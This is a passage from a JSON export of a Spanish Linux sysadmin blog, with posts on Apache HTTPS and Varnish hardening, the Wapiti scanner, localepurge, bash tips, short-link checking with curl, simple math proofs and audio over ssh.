configurado para escuchar en el puerto 443, el puerto bien definido para HTTPS, por lo que en el fichero /etc/apache2/ports.conf, debería haber algo como:\n# If you add NameVirtualHost *:443 here, you will also have to change # the VirtualHost statement in /etc/apache2/sites-available/default-ssl # to # Server Name Indication for SSL named virtual hosts is currently not # supported by MSIE on Windows XP. Listen 443 Sólo queda reiniciar el servicio:\n$ sudo apache2ctl graceful Y asegurarnos de que la NAT del router está configurada correctamente, si es que la usamos, o de que el cortafuegos deja pasar las peticiones por el puerto 443.\nActualización el día 24 de marzo de 2013 Cuando se haya pasado un año, deberemos renovar el certificado.\nPrimero, generamos, de nuevo, una petición de certificación de un año, tal como hicimos al crear el certificado. El nombre del fichero debe ser newreq.pem:\n$ sudo openssl req -new -key /etc/ssl/private/server.key -out /etc/ssl/newreq.pem Firmamos el certificado:\n$ sudo /usr/lib/ssl/misc/CA.sh -signreq Renombramos el certificado firmado y lo movemos al directorio correspondiente:\n$ sudo mv /etc/ssl/{newcert.pem,certs/server.crt} Y ya sólo queda reiniciar Apache.\n$ sudo apache2ctl graceful Podemos comprobar las fechas de validez del certificado ejecutando:\n$ sudo openssl x509 -noout -dates -in /etc/ssl/certs/server.crt notBefore=Mar 24 11:52:07 2013 GMT notAfter=Mar 24 11:52:07 2014 GMT O podemos obtenerlo directamente del servidor web:\n$ openssl s_client -showcerts -connect terminus.ignaciocano.com:443 Bonus Para comprobar la calidad de una conexión segura, podemos usar nuevamente el comando openssl.\nSiguiendo los criterios del artículo enlazado, comprobamos que no dé soporte a SSL v2, ya que se puede considerar obsoleto:\n$ openssl s_client -ssl2 -connect localhost:443 CONNECTED(00000003) 19609:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:428 Vemos que no cumplimos con la validación extendida en el certificado, pero es que hemos usado nuestra propia autoridad certificadora.\nComprobamos que la longitud de la clave es la mínima aceptable:\n$ openssl s_client -connect localhost:443 Server public key is 2048 bit Por último, comprobamos que no admita algoritmos débiles, cuya longitud de clave sea de 56 ó 64 bits:\n$ openssl s_client -cipher LOW:EXP -connect localhost:443 CONNECTED(00000003) 1433:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:596: Actualización el día 24 de marzo de 2013 También podemos utilizar un servicio externo, como SSL Server Test, de Qualys SSL Labs.\nSi nos aparece que nuestro certificado es vulnerable al ataque BEAST, podemos mitigarlo utilizando las siguientes directivas en la configuración de Apache:\nSSLHonorCipherOrder On SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:RC4:HIGH:!MD5:!aNULL:!EDH Más información:\n» ivanr Mitigating the BEAST attack on TLS » ivanr RC4 in TLS is Broken: Now What?\nActualizado el día 25 de enero de 2015 Dado que SHA1 va quedando obsoleto, es conveniente ir actualizando el certificado. Creamos la petición de firmado del certificado:\n$ sudo openssl req -new -sha256 -key /etc/ssl/private/server.key -out /etc/ssl/newreq.pem Confirmamos la información de la petición:\n$ sudo openssl req -in /etc/ssl/newreq.pem -text -noout Firmamos la petición:\n$ sudo /usr/lib/ssl/misc/CA.sh -signreq Movemos el certificado al directorio correspondiente:\n$ sudo mv /etc/ssl/{newcert.pem,certs/server.crt} Reiniciamos apache:\n$ sudo apache2ctl restart Utilidades Algunas utilidades para analizar la configuración SSL del servidor:\n» TLSSLed » SSLyze\n","permalink":"http://karpoke.ignaciocano.com/2011/06/14/configurar-apache-para-servir-conexiones-seguras/","summary":"\u003cp\u003eSi tenemos Apache, y queremos configurarlo para que se pueda navegar de\nforma segura por nuestro sitio utilizando el protocolo HTTPS,\nnecesitamos:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecrear las claves que se utilizarán para cifrar la conexión,\u003c/li\u003e\n\u003cli\u003econfigurar \u003ccode\u003emod_ssl\u003c/code\u003e, el módulo de Apache para usar conexiones\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eseguras,\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003ey permitir la conexión por el puerto 443.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"crear-las-claves-de-cifrado\"\u003eCrear las claves de cifrado\u003c/h2\u003e\n\u003cp\u003eVamos a generar un par de claves RSA triple DES de 2048 bits en el\ndirectorio \u003ccode\u003e/etc/ssl\u003c/code\u003e:\u003c/p\u003e","title":"Configurar Apache para servir conexiones seguras"},{"content":"Wapiti es un escáner de vulnerabilidades web basado en fuzzing. En la última versión, 2.2.1, permite detectar vulnerabilidades referente a:\nErrores de gestión de ficheros (include/require local y remoto, fopen, readfile...) Database Injection (PHP/JSP/ASP SQL Injections y XPath Injections) XSS (Cross Site Scripting) Injection LDAP Injection Command Execution detection (eval(), system(), passtru()\u0026hellip;) CRLF Injection (HTTP Response Splitting, session fixation\u0026hellip;) Sin embargo, si usamos Ubuntu Natty Narwhal, la versión de los repositorios es la 1.1.6, por lo que es posible que nos encontremos el siguiente error al escanear páginas que contengan caracteres no ASCII. Por ejemplo:\n$ wapiti http://127.0.0.1/ -v 1 -m GET_XSS -u Wapiti-1.1.6 (wapiti.sourceforge.net) Traceback (most recent call last): File \u0026#34;/usr/bin/wapiti\u0026#34;, line 943, in wap.browse() File \u0026#34;/usr/bin/wapiti\u0026#34;, line 123, in browse self.myls.go() File \u0026#34;/usr/share/wapiti/lswww.py\u0026#34;, line 396, in go if self.browse(lien): File \u0026#34;/usr/share/wapiti/lswww.py\u0026#34;, line 207, in browse p.feed(htmlSource) File \u0026#34;/usr/lib/python2.7/HTMLParser.py\u0026#34;, line 108, in feed self.goahead(0) File \u0026#34;/usr/lib/python2.7/HTMLParser.py\u0026#34;, line 148, in goahead k = self.parse_starttag(i) File \u0026#34;/usr/lib/python2.7/HTMLParser.py\u0026#34;, line 252, in parse_starttag attrvalue = self.unescape(attrvalue) File \u0026#34;/usr/lib/python2.7/HTMLParser.py\u0026#34;, line 393, in unescape return re.sub(r\u0026#34;\u0026amp;(#?[xX]?(?:[0-9a-fA-F]+|\\w{1,8}));\u0026#34;, replaceEntities, s) File \u0026#34;/usr/lib/python2.7/re.py\u0026#34;, line 151, in sub return _compile(pattern, flags).sub(repl, string, count) UnicodeDecodeError: \u0026#39;ascii\u0026#39; codec can\u0026#39;t decode byte 0xc2 in position 0: ordinal not in range(128) Parece ser que este error está solucionado en la versión en desarrollo, por lo que lo mejor sería probar la última versión.\nAún así, podemos evitarlo modificando el fichero vim /usr/share/wapiti/lswww.py, y cambiando las ocurrencias de:\np.feed(htmlSource) por:\np.feed(htmlSource.decode(\u0026#34;utf-8\u0026#34;, \u0026#34;replace\u0026#34;)) ","permalink":"http://karpoke.ignaciocano.com/2011/05/28/unicodedecodeerror-con-wapiti/","summary":"\u003cp\u003e\u003ca href=\"http://wapiti.sourceforge.net/\"\u003eWapiti\u003c/a\u003e es un escáner de vulnerabilidades web basado en\n\u003ca href=\"http://omniumpotentior.wordpress.com/2011/05/18/fuzzing-web-con-wapiti/\"\u003e\u003cem\u003efuzzing\u003c/em\u003e\u003c/a\u003e. En la última versión, \u003ca href=\"http://wapiti.sourceforge.net/README\"\u003e2.2.1\u003c/a\u003e, permite detectar\nvulnerabilidades referente a:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eErrores de gestión de ficheros (include/require local y remoto,\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003efopen, readfile...)\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eDatabase Injection (PHP/JSP/ASP SQL Injections y XPath Injections)\u003c/li\u003e\n\u003cli\u003eXSS (Cross Site Scripting) Injection\u003c/li\u003e\n\u003cli\u003eLDAP Injection\u003c/li\u003e\n\u003cli\u003eCommand Execution detection (eval(), system(), passtru()\u0026hellip;)\u003c/li\u003e\n\u003cli\u003eCRLF Injection (HTTP Response Splitting, session fixation\u0026hellip;)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSin embargo, si usamos Ubuntu Natty Narwhal, la versión de los\nrepositorios es la 1.1.6, por lo que es posible que nos encontremos el\nsiguiente error al escanear páginas que contengan \u003ca href=\"http://wiki.python.org/moin/UnicodeDecodeError\"\u003ecaracteres no\nASCII\u003c/a\u003e. Por ejemplo:\u003c/p\u003e","title":"UnicodeDecodeError con Wapiti"},{"content":"Nota mental:\n$ python -c \u0026#34;from distutils.sysconfig import get_python_lib; print get_python_lib()\u0026#34; /usr/lib/python2.7/dist-packages Ligeramente relacionado » Creando y leyendo códigos QR desde Python\nA lo mejor, si el intérprete de Python no encuentra un paquete es que no está donde debería\u0026hellip; :facepalm:\n","permalink":"http://karpoke.ignaciocano.com/2011/05/28/donde-esta-el-site-packages/","summary":"\u003cp\u003e\u003ca href=\"http://docs.djangoproject.com/en/dev/topics/install/?from=olddocs#remove-any-old-versions-of-django\"\u003eNota\u003c/a\u003e mental:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ python -c \u0026#34;from distutils.sysconfig import get_python_lib; print get_python_lib()\u0026#34;\n/usr/lib/python2.7/dist-packages\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"ligeramente-relacionado\"\u003eLigeramente relacionado\u003c/h2\u003e\n\u003cp\u003e» \u003ca href=\"/2011/03/27/creando-y-leyendo-codigos-qr-desde-python/\"\u003eCreando y leyendo códigos QR desde Python\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eA lo mejor, si el intérprete de Python no encuentra un paquete es que no\nestá donde debería\u0026hellip; :facepalm:\u003c/p\u003e","title":"¿Dónde está el site-packages?"},{"content":"Varnish es un acelerador web, que puede ser utilizado tanto para cachear contenido estático de nuestro servidor, para balancear la carga o para incrementar la seguridad, por ejemplo, bloqueando cierto tipo de peticiones u ocultando cierto tipo de información.\nSe instala directamente de los repositorios:\n$ sudo aptitude install varnish Ahora lo configuraremos para utilizarlo como capa intermedia, delante de nuestro Apache. Editamos el fichero /etc/default/varnish y cambiamos:\nDAEMON_OPTS=\u0026#34;-a :6081 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s file,/var/lib/varnish/$INSTANCE/varnish_storage.bin,1G\u0026#34; por:\nDAEMON_OPTS=\u0026#34;-a :80 -T localhost:6082 -f /etc/varnish/000-default.vcl -S /etc/varnish/secret -s file,/var/lib/varnish/$INSTANCE/varnish_storage.bin,1G\u0026#34; En el fichero /etc/varnish/000-default.vcl específicamos las reglas que queremos aplicar a las peticiones que le van a llegar a Apache. Podemos eliminar cabeceras o modificarlas, por ejemplo, cambiando el nombre y la versión de Apache. Conviene recordar que cambiar el nombre del servidor, no lo hace más seguro.\nTambién podemos descartar peticiones que cumplan algún criterio, por ejemplo que contenga la cadena \u0026ldquo;w00tw00t\u0026rdquo;.\n## Redirect requests to Apache, running on port 8000 on localhost backend apache { .host = \u0026#34;127.0.0.1\u0026#34;; .port = \u0026#34;8080\u0026#34;; } ## Fetch sub vcl_fetch { ## Change server signature unset obj.http.Server; set obj.http.Server = \u0026#34;Unknown\u0026#34;; ## Remove the X-Forwarded-For header if it exists. remove req.http.X-Forwarded-For; ## insert the client IP address as X-Forwarded-For. This is the normal IP address of the user. set req.http.X-Forwarded-For = req.http.rlnclientipaddr; ## Added security, the \u0026#34;w00tw00t\u0026#34; attacks are pretty annoying so lets block it before it reaches our webserver if (req.url ~ \u0026#34;^/w00tw00t\u0026#34;) { error 403 \u0026#34;Not permitted\u0026#34;; } ## Deliver the content return(deliver); } ## Deliver sub vcl_deliver { ## We\u0026#39;ll be hiding some headers added by Varnish. We want to make sure people are not seeing we\u0026#39;re using Varnish. ## Since we\u0026#39;re not caching (yet), why bother telling people we use it? remove resp.http.X-Varnish; remove resp.http.Via; remove resp.http.Age; ## We\u0026#39;d like to hide the X-Powered-By headers. Nobody has to know we can run PHP and have version xyz of it. remove resp.http.X-Powered-By; } Ahora, cambiamos el puerto en el que escucha Apache, editando el fichero /etc/apache2/ports.conf:\nNameVirtualHost *:8080 Listen 127.0.0.1:8080 También debemos editar nuestros hosts virtuales, por ejemplo, /etc/apache2/sites-enabled/default, y cambiamos:\n\u0026lt;VirtualHost 127.0.0.1\u0026gt; por:\n\u0026lt;VirtualHost 127.0.0.1:8080\u0026gt; Tras hacer este cambio, el único que «hablará» con Apache será Varnish, por lo que la única IP que veremos será la 127.0.0.1. Instalaremos un módulo extra de Apache para asegurarnos de que la IP es la correcta:\n$ sudo aptitude install libapache2-mod-rpaf $ sudo a2enmod rpaf RPAF (Reverse Proxy Add Forward) reemplazará la IP por la que Varnish habrá puesto en la cabecera X-Forwarded-For.\nReiniciamos los servicios:\n$ sudo service apache2 restart $ sudo service varnish restart Si todo ha ido bien, Varnish deberá estar escuchando en el puerto 80 y Apache en el 8080:\n$ sudo netstat -lp | grep apache2 tcp 0 0 localhost:http-alt _:_ ESCUCHAR 2587/apache2 $ sudo netstat -lp | grep varnishd tcp 0 0 _:www *:_ ESCUCHAR 9452/varnishd tcp 0 0 localhost:6082 _:_ ESCUCHAR 9451/varnishd tcp6 0 0 [::]:www [::]:* ESCUCHAR 9452/varnishd Previously » Cabeceras HTTP » Ocultando cabeceras » Cabeceras HTTPS personalizadas en Apache2 » w00tw00t en los logs de Apache\n","permalink":"http://karpoke.ignaciocano.com/2011/05/26/mejorando-la-seguridad-de-apache-con-varnish/","summary":"\u003cp\u003e\u003ca href=\"http://www.varnish-cache.org/docs/2.1/\"\u003eVarnish\u003c/a\u003e es un acelerador web, que puede ser utilizado tanto para\ncachear contenido estático de nuestro servidor, para balancear la carga\no \u003ca href=\"http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian\"\u003epara incrementar la seguridad\u003c/a\u003e, por ejemplo, bloqueando cierto tipo\nde peticiones u ocultando cierto tipo de información.\u003c/p\u003e\n\u003cp\u003eSe instala directamente de los repositorios:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install varnish\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAhora lo configuraremos para utilizarlo como capa intermedia, delante de\nnuestro Apache. Editamos el fichero \u003ccode\u003e/etc/default/varnish\u003c/code\u003e y cambiamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eDAEMON_OPTS=\u0026#34;-a :6081\n-T localhost:6082\n-f /etc/varnish/default.vcl\n-S /etc/varnish/secret\n-s file,/var/lib/varnish/$INSTANCE/varnish_storage.bin,1G\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003epor:\u003c/p\u003e","title":"Mejorando la seguridad de Apache con Varnish"},{"content":"localepurge es una herramienta que elimina los archivos de traducción que no necesitemos. Después de instalarlo, nos pedirá que seleccionemos qué idiomas queremos conservar:\nen_US en_US.ISO-8859-15 en_US.UTF-8 es es_ES es_ES@euro es_ES.UTF-8 Después de instalarlo, lo ejecutamos:\n$ sudo localepurge Total disk space freed by localepurge: 26552 KiB Cada vez que instalemos un nuevo paquete de los respositorios se ejecutará automáticamente, por lo que no tendremos que volver a preocuparnos.\nActualización a 17 de marzo de 2013 Acabo de encontrar una anotación interesante en el blog del crysol. En lugar de eliminar las traducciones que no nos interesan, podemos, directamente, evitar descargarlas. Editamos el fichero /etc/apt/apt.conf.d/99Translations, y añadimos lo que necesitemos, por ejemplo:\nAcquire::Languages:: \u0026#34;es\u0026#34;; Acquire::Languages:: \u0026#34;es_ES\u0026#34;; O, mejor aún, si no queremos bajar ninguna traducción:\nAcquire::Languages:: \u0026#34;none\u0026#34;; Podemos ver la configuración con el comando apt-config:\n$ apt-config dump | grep Lang Acquire::Languages \u0026#34;\u0026#34;; A partir de ahora, las actualizaciones deberían ir algo más rápidas.\n","permalink":"http://karpoke.ignaciocano.com/2011/05/25/localepurge/","summary":"\u003cp\u003e\u003ccode\u003elocalepurge\u003c/code\u003e es una herramienta que elimina los archivos de traducción\nque no necesitemos. Después de instalarlo, nos pedirá que \u003ca href=\"http://www.guia-ubuntu.org/index.php?title=Localepurge\"\u003eseleccionemos\nqué idiomas queremos conservar\u003c/a\u003e:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003een_US\u003c/li\u003e\n\u003cli\u003een_US.ISO-8859-15\u003c/li\u003e\n\u003cli\u003een_US.UTF-8\u003c/li\u003e\n\u003cli\u003ees\u003c/li\u003e\n\u003cli\u003ees_ES\u003c/li\u003e\n\u003cli\u003ees_ES@euro\u003c/li\u003e\n\u003cli\u003ees_ES.UTF-8\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDespués de instalarlo, lo ejecutamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo localepurge\nTotal disk space freed by localepurge: 26552 KiB\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCada vez que instalemos un nuevo paquete de los respositorios se\nejecutará automáticamente, por lo que no tendremos que volver a\npreocuparnos.\u003c/p\u003e\n\u003chr\u003e\n\u003ch4 id=\"actualización-a-17-de-marzo-de-2013\"\u003eActualización a 17 de marzo de 2013\u003c/h4\u003e\n\u003cp\u003eAcabo de encontrar una anotación interesante en el blog del \u003ca href=\"http://crysol.org/es/node/1696\"\u003ecrysol\u003c/a\u003e.\nEn lugar de eliminar las traducciones que no nos interesan, podemos,\ndirectamente, evitar descargarlas. Editamos el fichero\n\u003ccode\u003e/etc/apt/apt.conf.d/99Translations\u003c/code\u003e, y añadimos lo que necesitemos, por\nejemplo:\u003c/p\u003e","title":"localepurge"},{"content":" $$ \\begin{align*} \\frac{1}{3} \u0026= 0.\\stackrel{\\frown}{3} \\\\ \\frac{1}{3} \u0026= 0.333\\dots \\\\ 3 \\cdot \\frac{1}{3} \u0026= 3 \\cdot 0.333\\dots \\\\ 1 \u0026= 0.999\\dots \\\\ 1 \u0026= 0.\\stackrel{\\frown}{9} \\end{align*} $$ ","permalink":"http://karpoke.ignaciocano.com/2011/05/18/0-coma-9-periodo-igual-1/","summary":"\u003cdiv\u003e\n$$\n\\begin{align*}\n\\frac{1}{3} \u0026= 0.\\stackrel{\\frown}{3} \\\\\n\\frac{1}{3} \u0026= 0.333\\dots \\\\\n3 \\cdot \\frac{1}{3} \u0026= 3 \\cdot 0.333\\dots \\\\\n1 \u0026= 0.999\\dots \\\\\n1 \u0026= 0.\\stackrel{\\frown}{9}\n\\end{align*}\n$$\n\u003c/div\u003e","title":"0.999...=1"},{"content":" $$ \\begin{align*} n! \u0026= n \\cdot (n-1) \\cdot (n-2) \\cdots 3 \\cdot 2 \\cdot 1 \\\\ n! \u0026= n \\cdot (n-1)! \\\\ (n-1)! \u0026= \\frac{n!}{n} \\end{align*} $$ Si tomamos $n=1$:\n$$ \\begin{align*} (1-1)! \u0026= \\frac{1!}{1} \\\\ 0! \u0026= 1 \\end{align*} $$ ","permalink":"http://karpoke.ignaciocano.com/2011/05/18/0-factorial-igual-1-factorial/","summary":"\u003cdiv\u003e\n$$\n\\begin{align*}\nn! \u0026= n \\cdot (n-1) \\cdot (n-2) \\cdots 3 \\cdot 2 \\cdot 1 \\\\\nn! \u0026= n \\cdot (n-1)! \\\\\n(n-1)! \u0026= \\frac{n!}{n}\n\\end{align*}\n$$\n\u003c/div\u003e\n\u003cp\u003eSi \u003ca href=\"http://www.adonald.btinternet.co.uk/Factor/Zero.html\"\u003etomamos\u003c/a\u003e $n=1$:\u003c/p\u003e\n\u003cdiv\u003e\n$$\n\\begin{align*}\n(1-1)! \u0026= \\frac{1!}{1} \\\\\n0! \u0026= 1\n\\end{align*}\n$$\n\u003c/div\u003e","title":"0!=1!"},{"content":"Con la llegada de la nueva Ubuntu, se ha cambiado el área de notificación por una nueva API. Para las aplicaciones que todavía no se han adaptado, se ha habilitado una lista blanca de aplicaciones que pueden utilizar la antigua área de notificación, hasta que se actualicen.\nPara ver qué aplicaciones hay en la lista:\n$ gsettings get com.canonical.Unity.Panel systray-whitelist [\u0026#39;JavaEmbeddedFrame\u0026#39;, \u0026#39;Mumble\u0026#39;, \u0026#39;Wine\u0026#39;, \u0026#39;Skype\u0026#39;, \u0026#39;hp-systray\u0026#39;, \u0026#39;scp-dbus-service\u0026#39;] Para añadir una aplicación, por ejemplo, dropbox:\n$ gsettings get com.canonical.Unity.Panel systray-whitelist [\u0026#39;JavaEmbeddedFrame\u0026#39;, \u0026#39;Mumble\u0026#39;, \u0026#39;Wine\u0026#39;, \u0026#39;Skype\u0026#39;, \u0026#39;hp-systray\u0026#39;, \u0026#39;scp-dbus-service\u0026#39;, \u0026#39;dropbox\u0026#39;] Para volver a los valores originales:\n$ gsettings reset com.canonical.Unity.Panel systray-whitelist Actualizado el 4 de febrero de 2012 El truco sigue funcionando en Ubuntu Oneiric Ocelot (11.10). Si queremos que el icono de Dropbox aparezca sin tener que cerrar la sesión, podemos matar el proceso y volverlo a arrancar:\n$ killall dropbox $ /usr/bin/dropbox Si estamos utilizando múltiples cuentas de Dropbox, podemos hacer lo mismo, pero lanzando el script, en lugar del comando dropbox directamente:\n$ killall dropbox $ MultipleDropboxInstances.sh ","permalink":"http://karpoke.ignaciocano.com/2011/05/12/aplicaciones-en-el-area-de-notificacion-de-ubuntu-natty-narwhal/","summary":"\u003cp\u003eCon la llegada de la nueva Ubuntu, se ha cambiado el área de\nnotificación por una \u003ca href=\"http://pricklytech.wordpress.com/2011/04/30/ubuntu-11-4-natty-customizing-the-notification-area-in-unity/\"\u003enueva API\u003c/a\u003e. Para las aplicaciones que todavía no\nse han adaptado, se ha habilitado una lista blanca de aplicaciones que\npueden utilizar la antigua área de notificación, hasta que se\nactualicen.\u003c/p\u003e\n\u003cp\u003ePara ver qué aplicaciones hay en la lista:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ gsettings get com.canonical.Unity.Panel systray-whitelist\n[\u0026#39;JavaEmbeddedFrame\u0026#39;, \u0026#39;Mumble\u0026#39;, \u0026#39;Wine\u0026#39;, \u0026#39;Skype\u0026#39;, \u0026#39;hp-systray\u0026#39;, \u0026#39;scp-dbus-service\u0026#39;]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara añadir una aplicación, por ejemplo, \u003ccode\u003edropbox\u003c/code\u003e:\u003c/p\u003e","title":"Aplicaciones en el área de notificación de Ubuntu Natty Narwhal"},{"content":"Si queremos copiar un directorio pero no queremos que se copien los archivos .svn, o .dropbox, podemos ejecutar:\n$ rsync -r --exclude=.dropbox /path/source/dir /path/destination ","permalink":"http://karpoke.ignaciocano.com/2011/05/11/copiar-un-directorio-excluyendo-los-archivos-de-una-clase/","summary":"\u003cp\u003eSi queremos copiar un directorio pero no queremos que se copien los\narchivos \u003ccode\u003e.svn\u003c/code\u003e, o \u003ccode\u003e.dropbox\u003c/code\u003e, podemos ejecutar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ rsync -r --exclude=.dropbox /path/source/dir /path/destination\n\u003c/code\u003e\u003c/pre\u003e","title":"Copiar un directorio excluyendo los archivos de una clase"},{"content":"Si queremos recorrer un directorio y hacer algo con cada fichero o subdirectorio contenido en él, podemos ejecutar algo como:\n$ for f in *; do echo \u0026#34;$f\u0026#34;; done En lugar de utilizar un for, también podríamos usar el comando find con el parámetro exec:\n$ find . -maxdepth 1 \\( -name \u0026#39;*\u0026#39; ! -name \u0026#39;.\u0026#39; \\) -exec echo {} \\; O en lugar del exec con un while:\n$ find . -maxdepth 1 \\( -name \u0026#39;*\u0026#39; ! -name \u0026#39;.\u0026#39; \\) | while read f; do echo \u0026#34;$f\u0026#34;; done Un par de cosas:\nes importante que el asterisco esté entre comillas simples, '*', o escaparlo con una barra invertida, `\\*`, para que Bash no lo expanda, utilizar comillas dobles cuando usamos la variable, \u0026quot;$f\u0026quot;, para que al expandirla, se trate el nombre entero incluyendo los espacios, y mediante -name '*' ! -name '.', find devolverá todos los ficheros y directorios menos el directorio especial `.`. También podríamos usar el comando ls con el argumento -b, que escapa los espacios:\n$ ls -b * | while read f; do echo \u0026#34;$f\u0026#34;; done ","permalink":"http://karpoke.ignaciocano.com/2011/05/11/nombres-de-fichero-con-espacios-en-bash/","summary":"\u003cp\u003eSi queremos recorrer un directorio y hacer algo con cada fichero o\nsubdirectorio contenido en él, podemos ejecutar algo como:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for f in *; do\necho \u0026#34;$f\u0026#34;;\ndone\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn lugar de utilizar un \u003ccode\u003efor\u003c/code\u003e, también podríamos usar el comando \u003ccode\u003efind\u003c/code\u003e\ncon el parámetro \u003ccode\u003eexec\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ find . -maxdepth 1 \\( -name \u0026#39;*\u0026#39; ! -name \u0026#39;.\u0026#39; \\) -exec echo {} \\;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eO en lugar del \u003ccode\u003eexec\u003c/code\u003e con un \u003ccode\u003ewhile\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ find . -maxdepth 1 \\( -name \u0026#39;*\u0026#39; ! -name \u0026#39;.\u0026#39; \\) | while read f; do\necho \u0026#34;$f\u0026#34;;\ndone\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eUn par de cosas:\u003c/p\u003e","title":"Nombres de fichero con espacios en Bash"},{"content":"Si habíamos estado trabajando en una sesión livecd, más tarde podemos recuperar los datos que hayamos guardado en dicha sesión montando el usb:\n$ sudo mount /media/miusb/casper.rw /mnt -o loop ","permalink":"http://karpoke.ignaciocano.com/2011/05/11/recuperar-los-datos-guardados-en-una-sesion-livecd/","summary":"\u003cp\u003eSi habíamos estado trabajando en una sesión \u003cem\u003elivecd\u003c/em\u003e, más tarde podemos\n\u003ca href=\"http://www.portalubuntu.com/2011/05/como-recuperar-los-archivos-guardados.html\"\u003erecuperar los datos que hayamos guardado en dicha sesión\u003c/a\u003e montando el\n\u003cem\u003eusb\u003c/em\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo mount /media/miusb/casper.rw /mnt -o loop\n\u003c/code\u003e\u003c/pre\u003e","title":"Recuperar los datos guardados en una sesión livecd"},{"content":"Un enlace corto es útil, por ejemplo, para incluir la dirección de una página web en servicios como Twitter, donde el número de caracteres está limitado. Sin embargo, se pueden utilizar para engañarnos y llevarnos a una página que no queramos, o incluso que distribuya malware.\nPara comprobar hacia dónde apunta un enlaces cortos podemos:\nutilizar un servicio como urlxray utilizar el comando curl: $ curl -sI http://goo.gl/GPb7Z | grep Location Location: http://terminus.homelinux.com/k/ utilizar un complemento para Firefox ","permalink":"http://karpoke.ignaciocano.com/2011/05/07/comprobar-a-donde-nos-lleva-un-enlace-corto/","summary":"\u003cp\u003eUn enlace corto es útil, por ejemplo, para incluir la dirección de una\npágina web en servicios como \u003ca href=\"/posts/hack/robando-la-identidad-del-vecino/\"\u003eTwitter\u003c/a\u003e, donde el número de caracteres\nestá limitado. Sin embargo, se pueden utilizar para engañarnos y\nllevarnos a una página que no queramos, o incluso que \u003ca href=\"http://www.worsttech.com/hack/hacker-attack/malware-spreading-via-shortened-urls-1102581.html\"\u003edistribuya\n\u003cem\u003emalware\u003c/em\u003e\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003ePara comprobar hacia dónde apunta un enlaces cortos podemos:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eutilizar un servicio como \u003ca href=\"http://urlxray.com/\"\u003eurlxray\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eutilizar el comando \u003ccode\u003ecurl\u003c/code\u003e:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ curl -sI http://goo.gl/GPb7Z | grep Location\nLocation: http://terminus.homelinux.com/k/\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eutilizar un complemento para \u003ca href=\"http://addons.mozilla.org/en-US/firefox/search/?q=short+url+expand\"\u003eFirefox\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"Comprobar a dónde nos lleva un enlace corto"},{"content":"Si tenemos acceso por ssh a otro ordenador, ambos con micrófono y altavoces, podemos redirigir el sonido en ambos sentidos, es decir, podemos conseguir cosas como:\nque lo que capta nuestro micrófono se escuche en los altavoces del otro ordenador y [viceversa][] que lo que se escribe en un ordenador se escuche en el otro y [viceversa][1] que el contenido de un fichero de texto se oiga en los altavoces remotos y [viceversa][1] que un archivo de audio se escuche en los altavoces remotos y [viceversa][2] que el audio de un archivo de vídeo se escuche en los altavoces remotos y [viceversa][3] Dispositivos de sonido en Ubuntu Maverick Meerkat Uno de los cambios de Ubuntu Maverick Meerkat (10.10) fue la desaparición del dispositivo /dev/dsp y otros, como /dev/mixer, /dev/sndstat y /dev/audio, al utilizar la interfaz ALSA en detrimento de la OSS API.\nPara los programas que tengan problemas para utilizar la API ALSA, existen los comandos esddsp, que permite redirigir datos de audio no-esd a través de esd y padsp, que permite lo mismo pero mediante PulseAudio.\nFuente: es.wikipedia.org\nRedirigir el micrófono local a los altavoces remotos Si disponemos de /dev/dsp en ambas máquinas podemos utilizar dd:\n$ dd if=/dev/dsp | ssh -c arcfour -C user@host dd of=/dev/dsp La opción -c permite especificar el tipo de cifrado, y la opción -C que se utilice compresión de datos, utilizando el mismo algoritmo empleado por gzip.\nTambién podemos utilizar aplay:\n$ arecord -f dat | ssh -C user@host aplay -f dat La opción -f permite especificar el formato:\n-f cd (16 bit 